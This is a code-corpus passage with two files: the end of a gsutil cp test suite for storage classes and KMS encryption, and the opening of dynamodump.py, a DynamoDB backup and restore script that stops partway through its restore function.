stderr = self.RunGsUtil(['cp', '-s', 'standard', local_file, dest_dir],
expected_status=1,
return_stderr=True)
self.assertIn('Cannot specify storage class for a non-cloud destination:',
stderr)
# TODO: Remove @skip annotation from this test once we upgrade to the Boto
# version that parses the storage class header for HEAD Object responses.
@SkipForXML('Need Boto version > 2.46.1')
def test_cp_specify_nondefault_storage_class(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo')
object2_suri = suri(object_uri) + 'bar'
# Specify storage class name as mixed case here to ensure that it
# gets normalized to uppercase (S3 would return an error otherwise), and
# that using the normalized case is accepted by each API.
nondefault_storage_class = {
's3': 'Standard_iA',
'gs': 'durable_REDUCED_availability'
}
storage_class = nondefault_storage_class[self.default_provider]
self.RunGsUtil(['cp', '-s', storage_class, suri(object_uri), object2_suri])
stdout = self.RunGsUtil(['stat', object2_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+%s' % storage_class,
flags=re.IGNORECASE)
@SkipForS3('Test uses gs-specific storage classes.')
def test_cp_sets_correct_dest_storage_class(self):
"""Tests that object storage class is set correctly with and without -s."""
# Use a non-default storage class as the default for the bucket.
bucket_uri = self.CreateBucket(storage_class='nearline')
# Ensure storage class is set correctly for a local-to-cloud copy.
local_fname = 'foo-orig'
local_fpath = self.CreateTempFile(contents=b'foo', file_name=local_fname)
foo_cloud_suri = suri(bucket_uri) + '/' + local_fname
self.RunGsUtil(['cp', '-s', 'standard', local_fpath, foo_cloud_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
stdout = self.RunGsUtil(['stat', foo_cloud_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+STANDARD',
flags=re.IGNORECASE)
# Ensure storage class is set correctly for a cloud-to-cloud copy when no
# destination storage class is specified.
foo_nl_suri = suri(bucket_uri) + '/foo-nl'
self.RunGsUtil(['cp', foo_cloud_suri, foo_nl_suri])
# TODO: Remove with-clause after adding storage class parsing in Boto.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
stdout = self.RunGsUtil(['stat', foo_nl_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+NEARLINE',
flags=re.IGNORECASE)
# Ensure storage class is set correctly for a cloud-to-cloud copy when a
# non-bucket-default storage class is specified.
foo_std_suri = suri(bucket_uri) + '/foo-std'
self.RunGsUtil(['cp', '-s', 'standard', foo_nl_suri, foo_std_suri])
# TODO: Remove with-clause after adding storage class parsing in Boto.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
stdout = self.RunGsUtil(['stat', foo_std_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+STANDARD',
flags=re.IGNORECASE)
def authorize_project_to_use_testing_kms_key(
self, key_name=testcase.KmsTestingResources.CONSTANT_KEY_NAME):
# Make sure our keyRing and cryptoKey exist.
keyring_fqn = self.kms_api.CreateKeyRing(
PopulateProjectId(None),
testcase.KmsTestingResources.KEYRING_NAME,
location=testcase.KmsTestingResources.KEYRING_LOCATION)
key_fqn = self.kms_api.CreateCryptoKey(keyring_fqn, key_name)
# Make sure that the service account for our default project is authorized
# to use our test KMS key.
self.RunGsUtil(['kms', 'authorize', '-k', key_fqn])
return key_fqn
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_dst_obj_from_src_with_no_key(self):
bucket_uri = self.CreateBucket()
obj1_name = 'foo'
obj2_name = 'bar'
key_fqn = self.authorize_project_to_use_testing_kms_key()
# Create the unencrypted object, then copy it, specifying a KMS key for the
# new object.
obj_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name=obj1_name,
contents=b'foo')
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key_fqn)]):
self.RunGsUtil(
['cp', suri(obj_uri),
'%s/%s' % (suri(bucket_uri), obj2_name)])
# Make sure the new object is encrypted with the specified KMS key.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK('%s/%s' % (suri(bucket_uri), obj2_name),
key_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_dst_obj_from_local_file(self):
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'abcd')
obj_name = 'foo'
obj_suri = suri(bucket_uri) + '/' + obj_name
key_fqn = self.authorize_project_to_use_testing_kms_key()
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key_fqn)]):
self.RunGsUtil(['cp', fpath, obj_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj_suri, key_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_works_with_resumable_upload(self):
resumable_threshold = 1024 * 1024 # 1M
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * resumable_threshold)
obj_name = 'foo'
obj_suri = suri(bucket_uri) + '/' + obj_name
key_fqn = self.authorize_project_to_use_testing_kms_key()
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key_fqn),
('GSUtil', 'resumable_threshold',
str(resumable_threshold))]):
self.RunGsUtil(['cp', fpath, obj_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj_suri, key_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_dst_obj_from_src_with_diff_key(self):
bucket_uri = self.CreateBucket()
obj1_name = 'foo'
obj2_name = 'bar'
key1_fqn = self.authorize_project_to_use_testing_kms_key()
key2_fqn = self.authorize_project_to_use_testing_kms_key(
key_name=testcase.KmsTestingResources.CONSTANT_KEY_NAME2)
obj1_suri = suri(
self.CreateObject(bucket_uri=bucket_uri,
object_name=obj1_name,
contents=b'foo',
kms_key_name=key1_fqn))
# Copy the object to the same bucket, specifying a different key to be used.
obj2_suri = '%s/%s' % (suri(bucket_uri), obj2_name)
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key2_fqn)]):
self.RunGsUtil(['cp', obj1_suri, obj2_suri])
# Ensure the new object has the different key.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj2_suri, key2_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
@SkipForXML('Copying KMS-encrypted objects prohibited with XML API')
def test_kms_key_not_applied_to_nonkms_dst_obj_from_src_with_kms_key(self):
bucket_uri = self.CreateBucket()
obj1_name = 'foo'
obj2_name = 'bar'
key1_fqn = self.authorize_project_to_use_testing_kms_key()
obj1_suri = suri(
self.CreateObject(bucket_uri=bucket_uri,
object_name=obj1_name,
contents=b'foo',
kms_key_name=key1_fqn))
# Copy the object to the same bucket, not specifying any KMS key.
obj2_suri = '%s/%s' % (suri(bucket_uri), obj2_name)
self.RunGsUtil(['cp', obj1_suri, obj2_suri])
# Ensure the new object has no KMS key.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUnencrypted(obj2_suri)
@unittest.skipUnless(
IS_WINDOWS,
'Only Windows paths need to be normalized to use backslashes instead of '
'forward slashes.')
def test_windows_path_with_back_and_forward_slash_is_normalized(self):
# Prior to this test and its corresponding fix, running
# `gsutil cp dir/./file gs://bucket` would result in an object whose name
# was "dir/./file", rather than just "file", as Windows tried to split on
# the path component separator "\" intead of "/".
tmp_dir = self.CreateTempDir()
self.CreateTempFile(tmpdir=tmp_dir, file_name='obj1', contents=b'foo')
bucket_uri = self.CreateBucket()
self.RunGsUtil(['cp', '%s\\./obj1' % tmp_dir, suri(bucket_uri)])
# If the destination path was not created correctly, this stat call should
# fail with a non-zero exit code because the specified object won't exist.
self.RunGsUtil(['stat', '%s/obj1' % suri(bucket_uri)])
def test_cp_minus_m_streaming_upload(self):
"""Tests that cp -m - anything is disallowed."""
stderr = self.RunGsUtil(['-m', 'cp', '-', 'file'],
return_stderr=True,
expected_status=1)
self.assertIn(
'CommandException: Cannot upload from a stream when using gsutil -m',
stderr)
@SequentialAndParallelTransfer
def test_cp_overwrites_existing_destination(self):
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'bar')
stderr = self.RunGsUtil(['cp', suri(key_uri), fpath], return_stderr=True)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'foo')
@SequentialAndParallelTransfer
def test_downloads_are_reliable_with_more_than_one_gsutil_instance(self):
test_file_count = 10
temporary_directory = self.CreateTempDir()
bucket_uri = self.CreateBucket(test_objects=test_file_count)
cp_args = ['cp', suri(bucket_uri, '*'), temporary_directory]
threads = []
for _ in range(2):
thread = threading.Thread(target=self.RunGsUtil, args=[cp_args])
thread.start()
threads.append(thread)
[t.join() for t in threads]
self.assertEqual(len(os.listdir(temporary_directory)), test_file_count)
class TestCpUnitTests(testcase.GsUtilUnitTestCase):
"""Unit tests for gsutil cp."""
def testDownloadWithNoHashAvailable(self):
"""Tests a download with no valid server-supplied hash."""
# S3 should have a special message for non-MD5 etags.
bucket_uri = self.CreateBucket(provider='s3')
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
object_uri.get_key().etag = '12345' # Not an MD5
dst_dir = self.CreateTempDir()
log_handler = self.RunCommand('cp', [suri(object_uri), dst_dir],
return_log_handler=True)
warning_messages = log_handler.messages['warning']
self.assertEquals(2, len(warning_messages))
self.assertRegex(
warning_messages[0], r'Non-MD5 etag \(12345\) present for key .*, '
r'data integrity checks are not possible')
self.assertIn('Integrity cannot be assured', warning_messages[1])
def test_object_and_prefix_same_name(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo')
self.CreateObject(bucket_uri=bucket_uri,
object_name='foo/bar',
contents=b'bar')
fpath = self.CreateTempFile()
# MockKey doesn't support hash_algs, so the MD5 will not match.
with SetBotoConfigForTest([('GSUtil', 'check_hashes', 'never')]):
self.RunCommand('cp', [suri(object_uri), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'foo')
def test_cp_upload_respects_no_hashes(self):
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'abcd')
with SetBotoConfigForTest([('GSUtil', 'check_hashes', 'never')]):
log_handler = self.RunCommand('cp', [fpath, suri(bucket_uri)],
return_log_handler=True)
warning_messages = log_handler.messages['warning']
self.assertEquals(1, len(warning_messages))
self.assertIn('Found no hashes to validate object upload',
warning_messages[0])
|
dynamodump.py
|
#!/usr/bin/env python
"""
Simple backup and restore script for Amazon DynamoDB using boto to work similarly to mysqldump.
Suitable for DynamoDB usages of smaller data volume which do not warrant the usage of AWS
Data Pipeline for backup/restores/empty.
dynamodump supports local DynamoDB instances as well (tested with dynalite).
"""
import argparse
import fnmatch
import json
import logging
import os
import shutil
import threading
import datetime
import errno
import sys
import time
import re
import zipfile
import tarfile
try:
from queue import Queue
except ImportError:
from Queue import Queue
try:
from urllib.request import urlopen
from urllib.error import URLError, HTTPError
except ImportError:
from urllib2 import urlopen, URLError, HTTPError
import boto.dynamodb2.layer1
from boto.dynamodb2.exceptions import ProvisionedThroughputExceededException
import botocore
import boto3
JSON_INDENT = 2
AWS_SLEEP_INTERVAL = 10 # seconds
LOCAL_SLEEP_INTERVAL = 1 # seconds
BATCH_WRITE_SLEEP_INTERVAL = 0.15 # seconds
MAX_BATCH_WRITE = 25 # DynamoDB limit
SCHEMA_FILE = "schema.json"
DATA_DIR = "data"
MAX_RETRY = 6
LOCAL_REGION = "local"
LOG_LEVEL = "INFO"
DATA_DUMP = "dump"
RESTORE_WRITE_CAPACITY = 25
THREAD_START_DELAY = 1 # seconds
CURRENT_WORKING_DIR = os.getcwd()
DEFAULT_PREFIX_SEPARATOR = "-"
MAX_NUMBER_BACKUP_WORKERS = 25
METADATA_URL = "http://169.254.169.254/latest/meta-data/"
def _get_aws_client(profile, region, service):
"""
Build connection to some AWS service.
"""
if region:
aws_region = region
else:
aws_region = os.getenv("AWS_DEFAULT_REGION")
# Fallback to querying metadata for region
if not aws_region:
try:
azone = urlopen(METADATA_URL + "placement/availability-zone",
data=None, timeout=5).read().decode()
aws_region = azone[:-1]
except URLError:
logging.exception("Timed out connecting to metadata service.\n\n")
sys.exit(1)
except HTTPError as e:
logging.exception("Error determining region used for AWS client. Typo in code?\n\n" +
str(e))
sys.exit(1)
if profile:
session = boto3.Session(profile_name=profile)
client = session.client(service, region_name=aws_region)
else:
client = boto3.client(service, region_name=aws_region)
return client
def get_table_name_by_tag(profile, region, tag):
"""
Using provided connection to dynamodb and tag, get all tables that have provided tag
Profile provided and, if needed, used to build connection to STS.
"""
matching_tables = []
all_tables = []
sts = _get_aws_client(profile, region, "sts")
dynamo = _get_aws_client(profile, region, "dynamodb")
account_number = sts.get_caller_identity().get("Account")
paginator = dynamo.get_paginator("list_tables")
tag_key = tag.split("=")[0]
tag_value = tag.split("=")[1]
get_all_tables = paginator.paginate()
for page in get_all_tables:
for table in page["TableNames"]:
all_tables.append(table)
logging.debug("Found table " + table)
for table in all_tables:
table_arn = "arn:aws:dynamodb:{}:{}:table/{}".format(region, account_number, table)
table_tags = dynamo.list_tags_of_resource(
ResourceArn=table_arn
)
for found_tag in table_tags["Tags"]:
if found_tag["Key"] == tag_key:
logging.debug("Checking table " + table + " tag " + found_tag["Key"])
if found_tag["Value"] == tag_value:
matching_tables.append(table)
logging.info("Matched table " + table)
return matching_tables
def do_put_bucket_object(profile, region, bucket, bucket_object):
"""
Put object into bucket. Only called if we've also created an archive file with do_archive()
Bucket must exist prior to running this function.
profile could be None.
bucket_object is file to be uploaded
"""
s3 = _get_aws_client(profile, region, "s3")
logging.info("Uploading backup to S3 bucket " + bucket)
try:
s3.upload_file(bucket_object, bucket, bucket_object,
ExtraArgs={
"ServerSideEncryption": "AES256"
})
except botocore.exceptions.ClientError as e:
logging.exception("Failed to put file to S3 bucket\n\n" + str(e))
sys.exit(1)
def do_get_s3_archive(profile, region, bucket, table, archive):
"""
Fetch latest file named filename from S3
Bucket must exist prior to running this function.
filename is args.dumpPath. File would be "args.dumpPath" with suffix .tar.bz2 or .zip
"""
s3 = _get_aws_client(profile, region, "s3")
if archive:
if archive == "tar":
archive_type = "tar.bz2"
else:
archive_type = "zip"
# Make sure bucket exists before continuing
try:
s3.head_bucket(
Bucket=bucket
)
except botocore.exceptions.ClientError as e:
logging.exception("S3 bucket " + bucket + " does not exist. "
"Can't get backup file\n\n" + str(e))
sys.exit(1)
try:
contents = s3.list_objects_v2(
Bucket=bucket,
Prefix=args.dumpPath
)
except botocore.exceptions.ClientError as e:
logging.exception("Issue listing contents of bucket " + bucket + "\n\n" + str(e))
sys.exit(1)
# Script will always overwrite older backup. Bucket versioning stores multiple backups.
# Therefore, just get item from bucket based on table name since that's what we name the files.
filename = None
for d in contents["Contents"]:
if d["Key"] == "{}/{}.{}".format(args.dumpPath, table, archive_type):
filename = d["Key"]
if not filename:
logging.exception("Unable to find file to restore from. "
"Confirm the name of the table you're restoring.")
sys.exit(1)
output_file = "/tmp/" + os.path.basename(filename)
logging.info("Downloading file " + filename + " to " + output_file)
s3.download_file(bucket, filename, output_file)
# Extract archive based on suffix
if tarfile.is_tarfile(output_file):
try:
logging.info("Extracting tar file...")
with tarfile.open(name=output_file, mode="r:bz2") as a:
a.extractall(path=".")
except tarfile.ReadError as e:
logging.exception("Error reading downloaded archive\n\n" + str(e))
sys.exit(1)
except tarfile.ExtractError as e:
# ExtractError is raised for non-fatal errors on extract method
logging.error("Error during extraction: " + str(e))
# Assuming zip file here since we're only supporting tar and zip at this time
else:
try:
logging.info("Extracting zip file...")
with zipfile.ZipFile(output_file, "r") as z:
z.extractall(path=".")
except zipfile.BadZipFile as e:
logging.exception("Problem extracting zip file\n\n" + str(e))
sys.exit(1)
def do_archive(archive_type, dump_path):
"""
Create compressed archive of dump_path.
Accepts archive_type of zip or tar and requires dump_path, directory added to archive
"""
archive_base = dump_path
if archive_type.lower() == "tar":
archive = archive_base + ".tar.bz2"
try:
logging.info("Creating tar file " + archive + "...")
with tarfile.open(name=archive, mode="w:bz2") as a:
for root, dirs, files in os.walk(archive_base):
for file in files:
a.add(os.path.join(root, file))
return True, archive
except tarfile.CompressionError as e:
logging.exception("compression method is not supported or the data cannot be"
" decoded properly.\n\n" + str(e))
sys.exit(1)
except tarfile.TarError as e:
logging.exception("Error creating tarfile archive.\n\n" + str(e))
sys.exit(1)
elif archive_type.lower() == "zip":
try:
logging.info("Creating zip file...")
archive = archive_base + ".zip"
with zipfile.ZipFile(archive, "w") as z:
for root, dirs, files in os.walk(archive_base):
for file in files:
z.write(os.path.join(root, file))
return True, archive
except zipfile.BadZipFile as e:
logging.exception("Problem creating zip file\n\n" + str(e))
sys.exit(1)
except zipfile.LargeZipFile:
logging.exception("Zip file would be too large. Update code to use Zip64 to continue.")
sys.exit(1)
else:
logging.error("Unsupported archive format received. Probably shouldn't have "
"made it to this code path. Skipping attempt at creating archive file")
return False, None
def get_table_name_matches(conn, table_name_wildcard, separator):
"""
Find tables to backup
"""
all_tables = []
last_evaluated_table_name = None
while True:
table_list = conn.list_tables(exclusive_start_table_name=last_evaluated_table_name)
all_tables.extend(table_list["TableNames"])
try:
last_evaluated_table_name = table_list["LastEvaluatedTableName"]
except KeyError:
break
matching_tables = []
for table_name in all_tables:
if fnmatch.fnmatch(table_name, table_name_wildcard):
logging.info("Adding %s", table_name)
matching_tables.append(table_name)
return matching_tables
def get_restore_table_matches(table_name_wildcard, separator):
"""
Find tables to restore
"""
matching_tables = []
try:
dir_list = os.listdir("./" + args.dumpPath)
except OSError:
logging.info("Cannot find \"./%s\", Now trying current working directory.."
% args.dumpPath)
dump_data_path = CURRENT_WORKING_DIR
try:
dir_list = os.listdir(dump_data_path)
except OSError:
logging.info("Cannot find \"%s\" directory containing dump files!"
% dump_data_path)
sys.exit(1)
for dir_name in dir_list:
if table_name_wildcard == "*":
matching_tables.append(dir_name)
elif separator == "":
if dir_name.startswith(re.sub(r"([A-Z])", r" \1", table_name_wildcard.split("*", 1)[0])
.split()[0]):
matching_tables.append(dir_name)
elif dir_name.split(separator, 1)[0] == table_name_wildcard.split("*", 1)[0]:
matching_tables.append(dir_name)
return matching_tables
def change_prefix(source_table_name, source_wildcard, destination_wildcard, separator):
"""
Update prefix used for searching tables
"""
source_prefix = source_wildcard.split("*", 1)[0]
destination_prefix = destination_wildcard.split("*", 1)[0]
if separator == "":
if re.sub(r"([A-Z])", r" \1", source_table_name).split()[0] == source_prefix:
return destination_prefix + re.sub(r"([A-Z])", r" \1", source_table_name)\
.split(" ", 1)[1].replace(" ", "")
if source_table_name.split(separator, 1)[0] == source_prefix:
return destination_prefix + separator + source_table_name.split(separator, 1)[1]
def delete_table(conn, sleep_interval, table_name):
"""
Delete table table_name
"""
if not args.dataOnly:
while True:
# delete table if exists
table_exist = True
try:
conn.delete_table(table_name)
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceNotFoundException":
table_exist = False
logging.info(table_name + " table deleted!")
break
elif e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying deletion of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying deletion of " +
table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceInUseException":
logging.info(table_name + " table is being deleted..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# if table exists, wait till deleted
if table_exist:
try:
while True:
logging.info("Waiting for " + table_name + " table to be deleted.. [" +
conn.describe_table(table_name)["Table"]["TableStatus"] + "]")
time.sleep(sleep_interval)
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceNotFoundException":
logging.info(table_name + " table deleted.")
pass
else:
logging.exception(e)
sys.exit(1)
def mkdir_p(path):
"""
Create directory to hold dump
"""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def batch_write(conn, sleep_interval, table_name, put_requests):
"""
Write data to table_name
"""
request_items = {table_name: put_requests}
i = 1
sleep = sleep_interval
while True:
response = conn.batch_write_item(request_items)
unprocessed_items = response["UnprocessedItems"]
if len(unprocessed_items) == 0:
break
if len(unprocessed_items) > 0 and i <= MAX_RETRY:
logging.debug(str(len(unprocessed_items)) +
" unprocessed items, retrying after %s seconds.. [%s/%s]"
% (str(sleep), str(i), str(MAX_RETRY)))
request_items = unprocessed_items
time.sleep(sleep)
sleep += sleep_interval
i += 1
else:
logging.info("Max retries reached, failed to processed batch write: " +
json.dumps(unprocessed_items, indent=JSON_INDENT))
logging.info("Ignoring and continuing..")
break
def wait_for_active_table(conn, table_name, verb):
"""
Wait for table to be indesired state
"""
while True:
if conn.describe_table(table_name)["Table"]["TableStatus"] != "ACTIVE":
logging.info("Waiting for " + table_name + " table to be " + verb + ".. [" +
conn.describe_table(table_name)["Table"]["TableStatus"] + "]")
time.sleep(sleep_interval)
else:
logging.info(table_name + " " + verb + ".")
break
def update_provisioned_throughput(conn, table_name, read_capacity, write_capacity, wait=True):
"""
Update provisioned throughput on the table to provided values
"""
logging.info("Updating " + table_name + " table read capacity to: " +
str(read_capacity) + ", write capacity to: " + str(write_capacity))
while True:
try:
conn.update_table(table_name,
{"ReadCapacityUnits": int(read_capacity),
"WriteCapacityUnits": int(write_capacity)})
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying updating throughput of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying updating throughput"
"of " + table_name + "..")
time.sleep(sleep_interval)
# wait for provisioned throughput update completion
if wait:
wait_for_active_table(conn, table_name, "updated")
def do_empty(dynamo, table_name):
"""
Empty table named table_name
"""
logging.info("Starting Empty for " + table_name + "..")
# get table schema
logging.info("Fetching table schema for " + table_name)
table_data = dynamo.describe_table(table_name)
table_desc = table_data["Table"]
table_attribute_definitions = table_desc["AttributeDefinitions"]
table_key_schema = table_desc["KeySchema"]
original_read_capacity = table_desc["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table_desc["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table_desc.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table_desc.get("GlobalSecondaryIndexes")
table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(original_write_capacity)}
logging.info("Deleting Table " + table_name)
delete_table(dynamo, sleep_interval, table_name)
logging.info("Creating Table " + table_name)
while True:
try:
dynamo.create_table(table_attribute_definitions, table_name, table_key_schema,
table_provisioned_throughput, table_local_secondary_indexes,
table_global_secondary_indexes)
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying creation of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying creation of " +
table_name + "..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, table_name, "created")
logging.info("Recreation of " + table_name + " completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
def do_backup(dynamo, read_capacity, tableQueue=None, srcTable=None):
"""
Connect to DynamoDB and perform the backup for srcTable or each table in tableQueue
"""
if srcTable:
table_name = srcTable
if tableQueue:
while True:
table_name = tableQueue.get()
if table_name is None:
break
logging.info("Starting backup for " + table_name + "..")
# trash data, re-create subdir
if os.path.exists(args.dumpPath + os.sep + table_name):
shutil.rmtree(args.dumpPath + os.sep + table_name)
mkdir_p(args.dumpPath + os.sep + table_name)
# get table schema
logging.info("Dumping table schema for " + table_name)
f = open(args.dumpPath + os.sep + table_name + os.sep + SCHEMA_FILE, "w+")
table_desc = dynamo.describe_table(table_name)
f.write(json.dumps(table_desc, indent=JSON_INDENT))
f.close()
if not args.schemaOnly:
original_read_capacity = \
table_desc["Table"]["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = \
table_desc["Table"]["ProvisionedThroughput"]["WriteCapacityUnits"]
# override table read capacity if specified
if read_capacity is not None and read_capacity != original_read_capacity:
update_provisioned_throughput(dynamo, table_name,
read_capacity, original_write_capacity)
# get table data
logging.info("Dumping table items for " + table_name)
mkdir_p(args.dumpPath + os.sep + table_name + os.sep + DATA_DIR)
i = 1
last_evaluated_key = None
while True:
try:
scanned_table = dynamo.scan(table_name,
exclusive_start_key=last_evaluated_key)
except ProvisionedThroughputExceededException:
logging.error("EXCEEDED THROUGHPUT ON TABLE " +
table_name + ". BACKUP FOR IT IS USELESS.")
tableQueue.task_done()
f = open(
args.dumpPath + os.sep + table_name + os.sep + DATA_DIR + os.sep +
str(i).zfill(4) + ".json", "w+"
)
f.write(json.dumps(scanned_table, indent=JSON_INDENT))
f.close()
i += 1
try:
last_evaluated_key = scanned_table["LastEvaluatedKey"]
except KeyError:
break
# revert back to original table read capacity if specified
if read_capacity is not None and read_capacity != original_read_capacity:
update_provisioned_throughput(dynamo,
table_name,
original_read_capacity,
original_write_capacity,
False)
logging.info("Backup for " + table_name + " table completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
tableQueue.task_done()
def do_restore(dynamo, sleep_interval, source_table, destination_table, write_capacity):
"""
Restore table
"""
logging.info("Starting restore for " + source_table + " to " + destination_table + "..")
# create table using schema
# restore source_table from dump directory if it exists else try current working directory
if os.path.exists("%s/%s" % (args.dumpPath, source_table)):
dump_data_path = args.dumpPath
else:
logging.info("Cannot find \"./%s/%s\", Now trying current working directory.."
% (args.dumpPath, source_table))
if os.path.exists("%s/%s" % (CURRENT_WORKING_DIR, source_table)):
dump_data_path = CURRENT_WORKING_DIR
else:
logging.info("Cannot find \"%s/%s\" directory containing dump files!"
% (CURRENT_WORKING_DIR, source_table))
sys.exit(1)
table_data = json.load(open(dump_data_path + os.sep + source_table + os.sep + SCHEMA_FILE))
table = table_data["Table"]
table_attribute_definitions = table["AttributeDefinitions"]
table_table_name = destination_table
table_key_schema = table["KeySchema"]
original_read_capacity = table["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table.get("GlobalSecondaryIndexes")
# override table write capacity if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
if write_capacity is None:
if original_write_capacity < RESTORE_WRITE_CAPACITY:
write_capacity = RESTORE_WRITE_CAPACITY
else:
write_capacity = original_write_capacity
# override GSI write capacities if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
original_gsi_write_capacities = []
if table_global_secondary_indexes is not None:
for gsi in table_global_secondary_indexes:
original_gsi_write_capacities.append(gsi["ProvisionedThroughput"]["WriteCapacityUnits"])
if gsi["ProvisionedThroughput"]["WriteCapacityUnits"] < int(write_capacity):
gsi["ProvisionedThroughput"]["WriteCapacityUnits"] = int(write_capacity)
# temp provisioned throughput for restore
table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(write_capacity)}
if not args.dataOnly:
logging.info("Creating " + destination_table + " table with temp write capacity of " +
str(write_capacity))
while True:
try:
dynamo.create_table(table_attribute_definitions, table_table_name, table_key_schema,
table_provisioned_throughput, table_local_secondary_indexes,
table_global_secondary_indexes)
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying creation of " + destination_table + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, "
"retrying creation of " + destination_table + "..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, destination_table, "created")
elif not args.skipThroughputUpdate:
# update provisioned capacity
if int(write_capacity) > original_write_capacity:
update_provisioned_throughput(dynamo,
destination_table,
original_read_capacity,
write_capacity,
False)
if not args.schemaOnly:
# read data files
logging.info("Restoring data for " + destination_table + " table..")
data_file_list = os.listdir(dump_data_path + os.sep + source_table +
os.sep + DATA_DIR + os.sep)
data_file_list.sort()
for data_file in data_file_list:
logging.info("Processing " + data_file + " of " + destination_table)
items = []
item_data = json.load(
open(
dump_data_path + os.sep + source_table + os.sep + DATA_DIR + os.sep + data_file
)
)
items.extend(item_data["Items"])
# batch write data
put_requests = []
while len(items) > 0:
put_requests.append({"PutRequest": {"Item": items.pop(0)}})
# flush every MAX_BATCH_WRITE
if len(put_requests) == MAX_BATCH_WRITE:
logging.debug("Writing next " + str(MAX_BATCH_WRITE) +
" items to " + destination_table + "..")
batch_write(dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)
del put_requests[:]
# flush remainder
if len(put_requests) > 0:
batch_write(dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)
if not args.skipThroughputUpdate:
# revert to original table write capacity if it has been modified
if int(write_capacity) != original_write_capacity:
update_provisioned_throughput(dynamo,
destination_table,
original_read_capacity,
original_write_capacity,
False)
# loop through each GSI to check if it has changed and update if necessary
if table_global_secondary_indexes is not None:
gsi_data = []
for gsi in table_global_secondary_indexes:
